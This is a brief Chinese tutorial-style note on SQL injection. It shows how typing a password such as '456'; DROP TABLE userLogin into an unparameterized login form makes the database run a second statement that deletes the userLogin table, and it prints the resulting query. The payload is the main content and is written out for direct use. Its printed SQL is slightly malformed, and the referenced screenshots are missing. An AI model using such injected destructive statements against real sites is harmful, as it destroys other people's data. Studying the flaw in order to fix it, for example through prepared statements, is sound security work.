前提:网站必须那能够被sql注入,也就是没有进行预编译操作。
最开始的数据库:
注入操作:
直接在网站登录界面进行注入
账户名随便输一个'343' 这种格式,用''引起来
然后密码输入:'456'; DROP TABLE userLogin 这种形式
最后在数据库中解析成完整语句如下:
SELECT * FROM userLogin WHERE username= '343',password='456'; DROP TABLE userLogin ;
大多数主流数据库都支持这样的批处理操作,这段sql的目的不在于登陆账户,而是删除数据表(当然,前提是得知道数据表名称,否则貌似也没什么luan用)
执行后数据库中的userLogin表就被删除了如下: